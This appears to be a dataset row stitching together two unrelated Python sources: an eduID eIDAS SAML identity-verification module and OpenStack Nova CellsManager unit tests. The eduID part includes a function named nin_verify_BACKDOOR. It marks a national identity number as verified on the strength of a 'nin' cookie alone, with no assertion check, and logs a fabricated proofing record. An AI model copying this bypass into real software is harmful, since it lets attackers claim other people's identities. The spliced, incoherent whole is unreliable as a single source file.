gt stringclasses 1
value | context stringlengths 2.49k 119k |
|---|---|
# -*- coding: utf-8 -*-
import base64
from enum import Enum, unique
from typing import Any, Mapping
from flask import redirect, request
from six.moves.urllib_parse import urlsplit, urlunsplit
from werkzeug.wrappers import Response as WerkzeugResponse
from eduid_common.api.decorators import require_user
from eduid_common.api.exceptions import AmTaskFailed, MsgTaskFailed
from eduid_common.api.helpers import verify_nin_for_user
from eduid_common.api.messages import CommonMsg, redirect_with_msg
from eduid_common.api.utils import save_and_sync_user, urlappend, verify_relay_state
from eduid_common.authn.acs_registry import acs_action
from eduid_common.authn.eduid_saml2 import get_authn_ctx
from eduid_common.authn.utils import get_saml_attribute
from eduid_common.session import session
# TODO: Import FidoCredential in eduid_userdb.credential.__init__
from eduid_userdb import User
from eduid_userdb.credentials.fido import FidoCredential
from eduid_userdb.logs import MFATokenProofing, SwedenConnectProofing
from eduid_userdb.proofing.state import NinProofingElement, NinProofingState
from eduid_userdb.proofing.user import ProofingUser
from eduid_webapp.eidas.app import current_eidas_app as current_app
from eduid_webapp.eidas.helpers import EidasMsg, is_required_loa, is_valid_reauthn
__author__ = 'lundberg'
@unique
class EidasAcsAction(Enum):
token_verify = 'token-verify-action'
nin_verify = 'nin-verify-action'
mfa_authn = 'mfa-authentication-action'
@acs_action(EidasAcsAction.token_verify)
@require_user
def token_verify_action(session_info: Mapping[str, Any], user: User) -> WerkzeugResponse:
"""
Use a Sweden Connect federation IdP assertion to verify a users MFA token and, if necessary,
the users identity.
:param session_info: the SAML session info
:param user: Central db user
:return: redirect response
"""
redirect_url = current_app.conf.token_verify_redirect_url
if not is_required_loa(session_info, 'loa3'):
return redirect_with_msg(redirect_url, EidasMsg.authn_context_mismatch)
if not is_valid_reauthn(session_info):
return redirect_with_msg(redirect_url, EidasMsg.reauthn_expired)
proofing_user = ProofingUser.from_user(user, current_app.private_userdb)
token_to_verify = proofing_user.credentials.filter(FidoCredential).find(
session['verify_token_action_credential_id']
)
# Check (again) if token was used to authenticate this session
if token_to_verify.key not in session['eduidIdPCredentialsUsed']:
return redirect_with_msg(redirect_url, EidasMsg.token_not_in_creds)
# Verify asserted NIN for user if there are no verified NIN
if proofing_user.nins.verified.count == 0:
nin_verify_action(session_info)
user = current_app.central_userdb.get_user_by_eppn(user.eppn)
proofing_user = ProofingUser.from_user(user, current_app.private_userdb)
token_to_verify = proofing_user.credentials.filter(FidoCredential).find(
session['verify_token_action_credential_id']
)
# Check that a verified NIN is equal to the asserted attribute personalIdentityNumber
_nin_list = get_saml_attribute(session_info, 'personalIdentityNumber')
if _nin_list is None:
raise ValueError("Missing PIN in SAML session info")
asserted_nin = _nin_list[0]
user_nin = proofing_user.nins.verified.find(asserted_nin)
if not user_nin:
current_app.logger.error('Asserted NIN not matching user verified nins')
current_app.logger.debug('Asserted NIN: {}'.format(asserted_nin))
return redirect_with_msg(redirect_url, EidasMsg.nin_not_matching)
# Create a proofing log
issuer = session_info['issuer']
current_app.logger.debug('Issuer: {}'.format(issuer))
authn_context = get_authn_ctx(session_info)
current_app.logger.debug('Authn context: {}'.format(authn_context))
try:
user_address = current_app.msg_relay.get_postal_address(user_nin.number)
except MsgTaskFailed as e:
current_app.logger.error('Navet lookup failed: {}'.format(e))
current_app.stats.count('navet_error')
return redirect_with_msg(redirect_url, CommonMsg.navet_error)
proofing_log_entry = MFATokenProofing(
eppn=proofing_user.eppn,
created_by='eduid-eidas',
nin=user_nin.number,
issuer=issuer,
authn_context_class=authn_context,
key_id=token_to_verify.key,
user_postal_address=user_address,
proofing_version='2018v1',
)
# Set token as verified
token_to_verify.is_verified = True
token_to_verify.proofing_method = 'SWAMID_AL2_MFA_HI'
token_to_verify.proofing_version = '2018v1'
# Save proofing log entry and save user
if current_app.proofing_log.save(proofing_log_entry):
current_app.logger.info('Recorded MFA token verification in the proofing log')
try:
save_and_sync_user(proofing_user)
except AmTaskFailed as e:
current_app.logger.error('Verifying token for user failed')
current_app.logger.error('{}'.format(e))
return redirect_with_msg(redirect_url, CommonMsg.temp_problem)
current_app.stats.count(name='fido_token_verified')
return redirect_with_msg(redirect_url, EidasMsg.verify_success, error=False)
@acs_action(EidasAcsAction.nin_verify)
@require_user
def nin_verify_action(session_info: Mapping[str, Any], user: User) -> WerkzeugResponse:
"""
Use a Sweden Connect federation IdP assertion to verify a users identity.
:param session_info: the SAML session info
:param user: Central db user
:return: redirect response
"""
redirect_url = current_app.conf.nin_verify_redirect_url
if not is_required_loa(session_info, 'loa3'):
return redirect_with_msg(redirect_url, EidasMsg.authn_context_mismatch)
if not is_valid_reauthn(session_info):
return redirect_with_msg(redirect_url, EidasMsg.reauthn_expired)
proofing_user = ProofingUser.from_user(user, current_app.private_userdb)
_nin_list = get_saml_attribute(session_info, 'personalIdentityNumber')
if _nin_list is None:
raise ValueError("Missing PIN in SAML session info")
asserted_nin = _nin_list[0]
if proofing_user.nins.verified.count != 0:
current_app.logger.error('User already has a verified NIN')
current_app.logger.debug(
'Primary NIN: {}. Asserted NIN: {}'.format(proofing_user.nins.primary.number, asserted_nin)
)
return redirect_with_msg(redirect_url, EidasMsg.nin_already_verified)
# Create a proofing log
issuer = session_info['issuer']
authn_context = get_authn_ctx(session_info)
try:
user_address = current_app.msg_relay.get_postal_address(asserted_nin)
except MsgTaskFailed as e:
current_app.logger.error('Navet lookup failed: {}'.format(e))
current_app.stats.count('navet_error')
return redirect_with_msg(redirect_url, CommonMsg.navet_error)
proofing_log_entry = SwedenConnectProofing(
eppn=proofing_user.eppn,
created_by='eduid-eidas',
nin=asserted_nin,
issuer=issuer,
authn_context_class=authn_context,
user_postal_address=user_address,
proofing_version='2018v1',
)
# Verify NIN for user
try:
nin_element = NinProofingElement(number=asserted_nin, created_by='eduid-eidas', is_verified=False)
proofing_state = NinProofingState(id=None, modified_ts=None, eppn=user.eppn, nin=nin_element)
if not verify_nin_for_user(user, proofing_state, proofing_log_entry):
current_app.logger.error(f'Failed verifying NIN for user {user}')
return redirect_with_msg(redirect_url, CommonMsg.temp_problem)
except AmTaskFailed:
current_app.logger.exception('Verifying NIN for user failed')
return redirect_with_msg(redirect_url, CommonMsg.temp_problem)
current_app.stats.count(name='nin_verified')
return redirect_with_msg(redirect_url, EidasMsg.nin_verify_success, error=False)
@require_user
def nin_verify_BACKDOOR(user: User) -> WerkzeugResponse:
"""
Mock using a Sweden Connect federation IdP assertion to verify a users identity
when the request carries a magic cookie.
:param user: Central db user
:return: redirect response
"""
redirect_url = current_app.conf.nin_verify_redirect_url
proofing_user = ProofingUser.from_user(user, current_app.private_userdb)
asserted_nin = request.cookies.get('nin')
if asserted_nin is None:
raise RuntimeError("No backdoor without a NIN in a cookie")
if proofing_user.nins.verified.count != 0:
current_app.logger.error('User already has a verified NIN')
current_app.logger.debug(
'Primary NIN: {}. Asserted NIN: {}'.format(proofing_user.nins.primary.number, asserted_nin)
)
return redirect_with_msg(redirect_url, ':ERROR:eidas.nin_already_verified')
# Create a proofing log
issuer = 'https://idp.example.com/simplesaml/saml2/idp/metadata.php'
authn_context = 'http://id.elegnamnden.se/loa/1.0/loa3'
user_address = {
'Name': {'GivenNameMarking': '20', 'GivenName': 'Magic Cookie', 'Surname': 'Testsson'},
'OfficialAddress': {'Address2': 'MAGIC COOKIE', 'PostalCode': '12345', 'City': 'LANDET'},
}
proofing_log_entry = SwedenConnectProofing(
eppn=proofing_user.eppn,
created_by='eduid-eidas',
nin=asserted_nin,
issuer=issuer,
authn_context_class=authn_context,
user_postal_address=user_address,
proofing_version='2018v1',
)
# Verify NIN for user
try:
nin_element = NinProofingElement(number=asserted_nin, created_by='eduid-eidas', is_verified=False)
proofing_state = NinProofingState(id=None, modified_ts=None, eppn=user.eppn, nin=nin_element)
if not verify_nin_for_user(user, proofing_state, proofing_log_entry):
current_app.logger.error(f'Failed verifying NIN for user {user}')
return redirect_with_msg(redirect_url, ':ERROR:Temporary technical problems')
except AmTaskFailed:
current_app.logger.exception('Verifying NIN for user failed')
return redirect_with_msg(redirect_url, ':ERROR:Temporary technical problems')
current_app.stats.count(name='nin_verified')
return redirect_with_msg(redirect_url, 'eidas.nin_verify_success')
@acs_action(EidasAcsAction.mfa_authn)
@require_user
def mfa_authentication_action(session_info: Mapping[str, Any], user: User) -> WerkzeugResponse:
relay_state = request.form.get('RelayState')
current_app.logger.debug('RelayState: {}'.format(relay_state))
redirect_url = None
if 'eidas_redirect_urls' in session:
redirect_url = session['eidas_redirect_urls'].pop(relay_state, None)
if not redirect_url:
# With no redirect url just redirect the user to dashboard for a new try to log in
# TODO: This will result in a error 400 until we put the authentication in the session
current_app.logger.error('Missing redirect url for mfa authentication')
return redirect_with_msg(current_app.conf.action_url, EidasMsg.no_redirect_url)
# We get the mfa authentication views "next" argument as base64 to avoid our request sanitation
# to replace all & to &
redirect_url = base64.b64decode(redirect_url).decode('utf-8')
# TODO: Rename verify_relay_state to verify_redirect_url
redirect_url = verify_relay_state(redirect_url)
if not is_required_loa(session_info, 'loa3'):
return redirect_with_msg(redirect_url, EidasMsg.authn_context_mismatch)
if not is_valid_reauthn(session_info):
return redirect_with_msg(redirect_url, EidasMsg.reauthn_expired)
# Check that a verified NIN is equal to the asserted attribute personalIdentityNumber
_personal_idns = get_saml_attribute(session_info, 'personalIdentityNumber')
if _personal_idns is None:
current_app.logger.error(
'Got no personalIdentityNumber attributes. pysaml2 without the right attribute_converter?'
)
# TODO: change to reasonable redirect_with_msg when the ENUM work for that is merged
raise RuntimeError('Got no personalIdentityNumber')
asserted_nin = _personal_idns[0]
user_nin = user.nins.verified.find(asserted_nin)
if not user_nin:
current_app.logger.error('Asserted NIN not matching user verified nins')
current_app.logger.debug('Asserted NIN: {}'.format(asserted_nin))
current_app.stats.count(name='mfa_auth_nin_not_matching')
return redirect_with_msg(redirect_url, EidasMsg.nin_not_matching)
if session.mfa_action is None:
# TODO: change to reasonable redirect_with_msg? This should not happen...
raise RuntimeError('No MFA info in the session')
session.mfa_action.success = True
session.mfa_action.issuer = session_info['issuer']
session.mfa_action.authn_instant = session_info['authn_info'][0][2]
session.mfa_action.authn_context = get_authn_ctx(session_info)
current_app.stats.count(name='mfa_auth_success')
current_app.stats.count(name=f'mfa_auth_{session_info["issuer"]}_success')
# Redirect back to action app but to the redirect-action view
resp = redirect_with_msg(redirect_url, EidasMsg.action_completed, error=False)
parsed_url = urlsplit(str(resp.location))
new_path = urlappend(str(parsed_url.path), 'redirect-action')
parsed_url = parsed_url._replace(path=new_path)
new_url = urlunsplit(parsed_url)
current_app.logger.debug(f'Redirecting to: {new_url}')
return redirect(new_url)
| |
# Copyright (c) 2012 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests For CellsManager
"""
import copy
import datetime
import mock
from oslo_config import cfg
from oslo_utils import timeutils
from six.moves import range
from nova.cells import messaging
from nova.cells import utils as cells_utils
from nova import context
from nova import objects
from nova import test
from nova.tests.unit.cells import fakes
from nova.tests.unit import fake_instance
from nova.tests.unit import fake_server_actions
from nova.tests.unit.objects import test_flavor
CONF = cfg.CONF
CONF.import_opt('compute_topic', 'nova.compute.rpcapi')
FAKE_COMPUTE_NODES = [dict(id=1, host='host1'), dict(id=2, host='host2')]
FAKE_SERVICES = [dict(id=1, host='host1'),
dict(id=2, host='host2'),
dict(id=3, host='host3')]
FAKE_TASK_LOGS = [dict(id=1, host='host1'),
dict(id=2, host='host2')]
class CellsManagerClassTestCase(test.NoDBTestCase):
"""Test case for CellsManager class."""
def setUp(self):
super(CellsManagerClassTestCase, self).setUp()
fakes.init(self)
# pick a child cell to use for tests.
self.our_cell = 'grandchild-cell1'
self.cells_manager = fakes.get_cells_manager(self.our_cell)
self.msg_runner = self.cells_manager.msg_runner
self.state_manager = fakes.get_state_manager(self.our_cell)
self.driver = self.cells_manager.driver
self.ctxt = 'fake_context'
def _get_fake_response(self, raw_response=None, exc=False):
if exc:
return messaging.Response(self.ctxt, 'fake',
test.TestingException(),
True)
if raw_response is None:
raw_response = 'fake-response'
return messaging.Response(self.ctxt, 'fake', raw_response, False)
def test_get_cell_info_for_neighbors(self):
self.mox.StubOutWithMock(self.cells_manager.state_manager,
'get_cell_info_for_neighbors')
self.cells_manager.state_manager.get_cell_info_for_neighbors()
self.mox.ReplayAll()
self.cells_manager.get_cell_info_for_neighbors(self.ctxt)
def test_post_start_hook_child_cell(self):
self.mox.StubOutWithMock(self.driver, 'start_servers')
self.mox.StubOutWithMock(context, 'get_admin_context')
self.mox.StubOutWithMock(self.cells_manager, '_update_our_parents')
self.driver.start_servers(self.msg_runner)
context.get_admin_context().AndReturn(self.ctxt)
self.cells_manager._update_our_parents(self.ctxt)
self.mox.ReplayAll()
self.cells_manager.post_start_hook()
def test_post_start_hook_middle_cell(self):
cells_manager = fakes.get_cells_manager('child-cell2')
msg_runner = cells_manager.msg_runner
driver = cells_manager.driver
self.mox.StubOutWithMock(driver, 'start_servers')
self.mox.StubOutWithMock(context, 'get_admin_context')
self.mox.StubOutWithMock(msg_runner,
'ask_children_for_capabilities')
self.mox.StubOutWithMock(msg_runner,
'ask_children_for_capacities')
driver.start_servers(msg_runner)
context.get_admin_context().AndReturn(self.ctxt)
msg_runner.ask_children_for_capabilities(self.ctxt)
msg_runner.ask_children_for_capacities(self.ctxt)
self.mox.ReplayAll()
cells_manager.post_start_hook()
def test_update_our_parents(self):
self.mox.StubOutWithMock(self.msg_runner,
'tell_parents_our_capabilities')
self.mox.StubOutWithMock(self.msg_runner,
'tell_parents_our_capacities')
self.msg_runner.tell_parents_our_capabilities(self.ctxt)
self.msg_runner.tell_parents_our_capacities(self.ctxt)
self.mox.ReplayAll()
self.cells_manager._update_our_parents(self.ctxt)
def test_build_instances(self):
build_inst_kwargs = {'instances': [objects.Instance(),
objects.Instance()]}
self.mox.StubOutWithMock(self.msg_runner, 'build_instances')
our_cell = self.msg_runner.state_manager.get_my_state()
self.msg_runner.build_instances(self.ctxt, our_cell, build_inst_kwargs)
self.mox.ReplayAll()
self.cells_manager.build_instances(self.ctxt,
build_inst_kwargs=build_inst_kwargs)
def test_build_instances_old_flavor(self):
flavor_dict = test_flavor.fake_flavor
args = {'filter_properties': {'instance_type': flavor_dict},
'instances': [objects.Instance()]}
with mock.patch.object(self.msg_runner, 'build_instances') as mock_bi:
self.cells_manager.build_instances(self.ctxt,
build_inst_kwargs=args)
filter_properties = mock_bi.call_args[0][2]['filter_properties']
self.assertIsInstance(filter_properties['instance_type'],
objects.Flavor)
def test_build_instances_old_instances(self):
args = {'instances': [fake_instance.fake_db_instance()]}
with mock.patch.object(self.msg_runner, 'build_instances') as mock_bi:
self.cells_manager.build_instances(self.ctxt,
build_inst_kwargs=args)
self.assertIsInstance(mock_bi.call_args[0][2]['instances'][0],
objects.Instance)
def test_run_compute_api_method(self):
# Args should just be silently passed through
cell_name = 'fake-cell-name'
method_info = 'fake-method-info'
self.mox.StubOutWithMock(self.msg_runner,
'run_compute_api_method')
fake_response = self._get_fake_response()
self.msg_runner.run_compute_api_method(self.ctxt,
cell_name,
method_info,
True).AndReturn(fake_response)
self.mox.ReplayAll()
response = self.cells_manager.run_compute_api_method(
self.ctxt, cell_name=cell_name, method_info=method_info,
call=True)
self.assertEqual('fake-response', response)
def test_instance_update_at_top(self):
self.mox.StubOutWithMock(self.msg_runner, 'instance_update_at_top')
self.msg_runner.instance_update_at_top(self.ctxt, 'fake-instance')
self.mox.ReplayAll()
self.cells_manager.instance_update_at_top(self.ctxt,
instance='fake-instance')
def test_instance_destroy_at_top(self):
self.mox.StubOutWithMock(self.msg_runner, 'instance_destroy_at_top')
self.msg_runner.instance_destroy_at_top(self.ctxt, 'fake-instance')
self.mox.ReplayAll()
self.cells_manager.instance_destroy_at_top(self.ctxt,
instance='fake-instance')
def test_instance_delete_everywhere(self):
self.mox.StubOutWithMock(self.msg_runner,
'instance_delete_everywhere')
self.msg_runner.instance_delete_everywhere(self.ctxt,
'fake-instance',
'fake-type')
self.mox.ReplayAll()
self.cells_manager.instance_delete_everywhere(
self.ctxt, instance='fake-instance',
delete_type='fake-type')
def test_instance_fault_create_at_top(self):
self.mox.StubOutWithMock(self.msg_runner,
'instance_fault_create_at_top')
self.msg_runner.instance_fault_create_at_top(self.ctxt,
'fake-fault')
self.mox.ReplayAll()
self.cells_manager.instance_fault_create_at_top(
self.ctxt, instance_fault='fake-fault')
def test_bw_usage_update_at_top(self):
self.mox.StubOutWithMock(self.msg_runner,
'bw_usage_update_at_top')
self.msg_runner.bw_usage_update_at_top(self.ctxt,
'fake-bw-info')
self.mox.ReplayAll()
self.cells_manager.bw_usage_update_at_top(
self.ctxt, bw_update_info='fake-bw-info')
def test_heal_instances(self):
self.flags(instance_updated_at_threshold=1000,
instance_update_num_instances=2,
group='cells')
fake_context = context.RequestContext('fake', 'fake')
stalled_time = timeutils.utcnow()
updated_since = stalled_time - datetime.timedelta(seconds=1000)
def utcnow():
return stalled_time
call_info = {'get_instances': 0, 'sync_instances': []}
instances = ['instance1', 'instance2', 'instance3']
def get_instances_to_sync(context, **kwargs):
self.assertEqual(context, fake_context)
call_info['shuffle'] = kwargs.get('shuffle')
call_info['project_id'] = kwargs.get('project_id')
call_info['updated_since'] = kwargs.get('updated_since')
call_info['get_instances'] += 1
return iter(instances)
def instance_get_by_uuid(context, uuid):
return instances[int(uuid[-1]) - 1]
def sync_instance(context, instance):
self.assertEqual(context, fake_context)
call_info['sync_instances'].append(instance)
self.stubs.Set(cells_utils, 'get_instances_to_sync',
get_instances_to_sync)
self.stubs.Set(self.cells_manager.db, 'instance_get_by_uuid',
instance_get_by_uuid)
self.stubs.Set(self.cells_manager, '_sync_instance',
sync_instance)
self.stubs.Set(timeutils, 'utcnow', utcnow)
self.cells_manager._heal_instances(fake_context)
self.assertEqual(call_info['shuffle'], True)
self.assertIsNone(call_info['project_id'])
self.assertEqual(call_info['updated_since'], updated_since)
self.assertEqual(call_info['get_instances'], 1)
# Only first 2
self.assertEqual(call_info['sync_instances'],
instances[:2])
call_info['sync_instances'] = []
self.cells_manager._heal_instances(fake_context)
self.assertEqual(call_info['shuffle'], True)
self.assertIsNone(call_info['project_id'])
self.assertEqual(call_info['updated_since'], updated_since)
self.assertEqual(call_info['get_instances'], 2)
# Now the last 1 and the first 1
self.assertEqual(call_info['sync_instances'],
[instances[-1], instances[0]])
def test_sync_instances(self):
self.mox.StubOutWithMock(self.msg_runner,
'sync_instances')
self.msg_runner.sync_instances(self.ctxt, 'fake-project',
'fake-time', 'fake-deleted')
self.mox.ReplayAll()
self.cells_manager.sync_instances(self.ctxt,
project_id='fake-project',
updated_since='fake-time',
deleted='fake-deleted')
def test_service_get_all(self):
responses = []
expected_response = []
# 3 cells... so 3 responses. Each response is a list of services.
# Manager should turn these into a single list of responses.
for i in range(3):
cell_name = 'path!to!cell%i' % i
services = []
for service in FAKE_SERVICES:
fake_service = objects.Service(**service)
services.append(fake_service)
expected_service = cells_utils.ServiceProxy(fake_service,
cell_name)
expected_response.append(
(cell_name, expected_service, fake_service))
response = messaging.Response(self.ctxt, cell_name, services,
False)
responses.append(response)
self.mox.StubOutWithMock(self.msg_runner,
'service_get_all')
self.mox.StubOutWithMock(cells_utils, 'add_cell_to_service')
self.msg_runner.service_get_all(self.ctxt,
'fake-filters').AndReturn(responses)
# Calls are done by cells, so we need to sort the list by the cell name
expected_response.sort(key=lambda k: k[0])
for cell_name, service_proxy, service in expected_response:
cells_utils.add_cell_to_service(
service, cell_name).AndReturn(service_proxy)
self.mox.ReplayAll()
response = self.cells_manager.service_get_all(self.ctxt,
filters='fake-filters')
self.assertEqual([proxy for cell, proxy, service in expected_response],
response)
def test_service_get_by_compute_host(self):
fake_cell = 'fake-cell'
fake_service = objects.Service(**FAKE_SERVICES[0])
fake_response = messaging.Response(self.ctxt, fake_cell,
fake_service,
False)
expected_response = cells_utils.ServiceProxy(fake_service, fake_cell)
cell_and_host = cells_utils.cell_with_item('fake-cell', 'fake-host')
self.mox.StubOutWithMock(self.msg_runner,
'service_get_by_compute_host')
self.mox.StubOutWithMock(cells_utils, 'add_cell_to_service')
self.msg_runner.service_get_by_compute_host(self.ctxt,
fake_cell, 'fake-host').AndReturn(fake_response)
cells_utils.add_cell_to_service(fake_service, fake_cell).AndReturn(
expected_response)
self.mox.ReplayAll()
response = self.cells_manager.service_get_by_compute_host(self.ctxt,
host_name=cell_and_host)
self.assertEqual(expected_response, response)
def test_get_host_uptime(self):
fake_cell = 'parent!fake-cell'
fake_host = 'fake-host'
fake_cell_and_host = cells_utils.cell_with_item(fake_cell, fake_host)
host_uptime = (" 08:32:11 up 93 days, 18:25, 12 users, load average:"
" 0.20, 0.12, 0.14")
fake_response = messaging.Response(self.ctxt, fake_cell, host_uptime,
False)
self.mox.StubOutWithMock(self.msg_runner,
'get_host_uptime')
self.msg_runner.get_host_uptime(self.ctxt, fake_cell, fake_host).\
AndReturn(fake_response)
self.mox.ReplayAll()
response = self.cells_manager.get_host_uptime(self.ctxt,
fake_cell_and_host)
self.assertEqual(host_uptime, response)
def test_service_update(self):
fake_cell = 'fake-cell'
fake_service = objects.Service(**FAKE_SERVICES[0])
fake_response = messaging.Response(
self.ctxt, fake_cell, fake_service, False)
expected_response = cells_utils.ServiceProxy(fake_service, fake_cell)
cell_and_host = cells_utils.cell_with_item('fake-cell', 'fake-host')
params_to_update = {'disabled': True}
self.mox.StubOutWithMock(self.msg_runner, 'service_update')
self.mox.StubOutWithMock(cells_utils, 'add_cell_to_service')
self.msg_runner.service_update(self.ctxt,
fake_cell, 'fake-host', 'nova-api',
params_to_update).AndReturn(fake_response)
cells_utils.add_cell_to_service(fake_service, fake_cell).AndReturn(
expected_response)
self.mox.ReplayAll()
response = self.cells_manager.service_update(
self.ctxt, host_name=cell_and_host, binary='nova-api',
params_to_update=params_to_update)
self.assertEqual(expected_response, response)
def test_service_delete(self):
fake_cell = 'fake-cell'
service_id = '1'
cell_service_id = cells_utils.cell_with_item(fake_cell, service_id)
with mock.patch.object(self.msg_runner,
'service_delete') as service_delete:
self.cells_manager.service_delete(self.ctxt, cell_service_id)
service_delete.assert_called_once_with(
self.ctxt, fake_cell, service_id)
def test_proxy_rpc_to_manager(self):
self.mox.StubOutWithMock(self.msg_runner,
'proxy_rpc_to_manager')
fake_response = self._get_fake_response()
cell_and_host = cells_utils.cell_with_item('fake-cell', 'fake-host')
topic = "%s.%s" % (CONF.compute_topic, cell_and_host)
self.msg_runner.proxy_rpc_to_manager(self.ctxt, 'fake-cell',
'fake-host', topic, 'fake-rpc-msg',
True, -1).AndReturn(fake_response)
self.mox.ReplayAll()
response = self.cells_manager.proxy_rpc_to_manager(self.ctxt,
topic=topic, rpc_message='fake-rpc-msg', call=True,
timeout=-1)
self.assertEqual('fake-response', response)
def _build_task_log_responses(self, num):
responses = []
expected_response = []
# 3 cells... so 3 responses. Each response is a list of task log
# entries. Manager should turn these into a single list of
# task log entries.
for i in range(num):
cell_name = 'path!to!cell%i' % i
task_logs = []
for task_log in FAKE_TASK_LOGS:
task_logs.append(copy.deepcopy(task_log))
expected_task_log = copy.deepcopy(task_log)
cells_utils.add_cell_to_task_log(expected_task_log,
cell_name)
expected_response.append(expected_task_log)
response = messaging.Response(self.ctxt, cell_name, task_logs,
False)
responses.append(response)
return expected_response, responses
def test_task_log_get_all(self):
expected_response, responses = self._build_task_log_responses(3)
self.mox.StubOutWithMock(self.msg_runner,
'task_log_get_all')
self.msg_runner.task_log_get_all(self.ctxt, None,
'fake-name', 'fake-begin',
'fake-end', host=None, state=None).AndReturn(responses)
self.mox.ReplayAll()
response = self.cells_manager.task_log_get_all(self.ctxt,
task_name='fake-name',
period_beginning='fake-begin', period_ending='fake-end')
self.assertEqual(expected_response, response)
def test_task_log_get_all_with_filters(self):
expected_response, responses = self._build_task_log_responses(1)
cell_and_host = cells_utils.cell_with_item('fake-cell', 'fake-host')
self.mox.StubOutWithMock(self.msg_runner,
'task_log_get_all')
self.msg_runner.task_log_get_all(self.ctxt, 'fake-cell',
'fake-name', 'fake-begin', 'fake-end', host='fake-host',
state='fake-state').AndReturn(responses)
self.mox.ReplayAll()
response = self.cells_manager.task_log_get_all(self.ctxt,
task_name='fake-name',
period_beginning='fake-begin', period_ending='fake-end',
host=cell_and_host, state='fake-state')
self.assertEqual(expected_response, response)
def test_task_log_get_all_with_cell_but_no_host_filters(self):
expected_response, responses = self._build_task_log_responses(1)
# Host filter only has cell name.
cell_and_host = 'fake-cell'
self.mox.StubOutWithMock(self.msg_runner,
'task_log_get_all')
self.msg_runner.task_log_get_all(self.ctxt, 'fake-cell',
'fake-name', 'fake-begin', 'fake-end', host=None,
state='fake-state').AndReturn(responses)
self.mox.ReplayAll()
response = self.cells_manager.task_log_get_all(self.ctxt,
task_name='fake-name',
period_beginning='fake-begin', period_ending='fake-end',
host=cell_and_host, state='fake-state')
self.assertEqual(expected_response, response)
def test_compute_node_get_all(self):
responses = []
expected_response = []
# 3 cells... so 3 responses. Each response is a list of computes.
# Manager should turn these into a single list of responses.
for i in range(3):
cell_name = 'path!to!cell%i' % i
compute_nodes = []
for compute_node in FAKE_COMPUTE_NODES:
fake_compute = objects.ComputeNode(**compute_node)
fake_compute._cached_service = None
compute_nodes.append(fake_compute)
expected_compute_node = cells_utils.ComputeNodeProxy(
fake_compute, cell_name)
expected_response.append(
(cell_name, expected_compute_node, fake_compute))
response = messaging.Response(self.ctxt, cell_name, compute_nodes,
False)
responses.append(response)
self.mox.StubOutWithMock(self.msg_runner,
'compute_node_get_all')
self.mox.StubOutWithMock(cells_utils, 'add_cell_to_compute_node')
self.msg_runner.compute_node_get_all(self.ctxt,
hypervisor_match='fake-match').AndReturn(responses)
# Calls are done by cells, so we need to sort the list by the cell name
expected_response.sort(key=lambda k: k[0])
for cell_name, compute_proxy, compute_node in expected_response:
cells_utils.add_cell_to_compute_node(
compute_node, cell_name).AndReturn(compute_proxy)
self.mox.ReplayAll()
response = self.cells_manager.compute_node_get_all(self.ctxt,
hypervisor_match='fake-match')
self.assertEqual([proxy for cell, proxy, compute in expected_response],
response)
def test_compute_node_stats(self):
raw_resp1 = {'key1': 1, 'key2': 2}
raw_resp2 = {'key2': 1, 'key3': 2}
raw_resp3 = {'key3': 1, 'key4': 2}
responses = [messaging.Response(self.ctxt, 'cell1', raw_resp1, False),
messaging.Response(self.ctxt, 'cell2', raw_resp2, False),
messaging.Response(self.ctxt, 'cell2', raw_resp3, False)]
expected_resp = {'key1': 1, 'key2': 3, 'key3': 3, 'key4': 2}
self.mox.StubOutWithMock(self.msg_runner,
'compute_node_stats')
self.msg_runner.compute_node_stats(self.ctxt).AndReturn(responses)
self.mox.ReplayAll()
response = self.cells_manager.compute_node_stats(self.ctxt)
self.assertEqual(expected_resp, response)
def test_compute_node_get(self):
fake_cell = 'fake-cell'
fake_compute = objects.ComputeNode(**FAKE_COMPUTE_NODES[0])
fake_compute._cached_service = None
fake_response = messaging.Response(self.ctxt, fake_cell,
fake_compute,
False)
expected_response = cells_utils.ComputeNodeProxy(fake_compute,
fake_cell)
cell_and_id = cells_utils.cell_with_item(fake_cell, 'fake-id')
self.mox.StubOutWithMock(self.msg_runner,
'compute_node_get')
self.mox.StubOutWithMock(cells_utils, 'add_cell_to_compute_node')
self.msg_runner.compute_node_get(self.ctxt,
'fake-cell', 'fake-id').AndReturn(fake_response)
cells_utils.add_cell_to_compute_node(
fake_compute, fake_cell).AndReturn(expected_response)
self.mox.ReplayAll()
response = self.cells_manager.compute_node_get(self.ctxt,
compute_id=cell_and_id)
self.assertEqual(expected_response, response)
def test_actions_get(self):
fake_uuid = fake_server_actions.FAKE_UUID
fake_req_id = fake_server_actions.FAKE_REQUEST_ID1
fake_act = fake_server_actions.FAKE_ACTIONS[fake_uuid][fake_req_id]
fake_response = messaging.Response(self.ctxt, 'fake-cell', [fake_act],
False)
expected_response = [fake_act]
self.mox.StubOutWithMock(self.msg_runner, 'actions_get')
self.msg_runner.actions_get(self.ctxt, 'fake-cell',
'fake-uuid').AndReturn(fake_response)
self.mox.ReplayAll()
response = self.cells_manager.actions_get(self.ctxt, 'fake-cell',
'fake-uuid')
self.assertEqual(expected_response, response)
def test_action_get_by_request_id(self):
fake_uuid = fake_server_actions.FAKE_UUID
fake_req_id = fake_server_actions.FAKE_REQUEST_ID1
fake_act = fake_server_actions.FAKE_ACTIONS[fake_uuid][fake_req_id]
fake_response = messaging.Response(self.ctxt, 'fake-cell', fake_act,
False)
expected_response = fake_act
self.mox.StubOutWithMock(self.msg_runner, 'action_get_by_request_id')
self.msg_runner.action_get_by_request_id(self.ctxt, 'fake-cell',
'fake-uuid', 'req-fake').AndReturn(fake_response)
self.mox.ReplayAll()
response = self.cells_manager.action_get_by_request_id(self.ctxt,
'fake-cell',
'fake-uuid',
'req-fake')
self.assertEqual(expected_response, response)
def test_action_events_get(self):
fake_action_id = fake_server_actions.FAKE_ACTION_ID1
fake_events = fake_server_actions.FAKE_EVENTS[fake_action_id]
fake_response = messaging.Response(self.ctxt, 'fake-cell', fake_events,
False)
expected_response = fake_events
self.mox.StubOutWithMock(self.msg_runner, 'action_events_get')
self.msg_runner.action_events_get(self.ctxt, 'fake-cell',
'fake-action').AndReturn(fake_response)
self.mox.ReplayAll()
response = self.cells_manager.action_events_get(self.ctxt, 'fake-cell',
'fake-action')
self.assertEqual(expected_response, response)
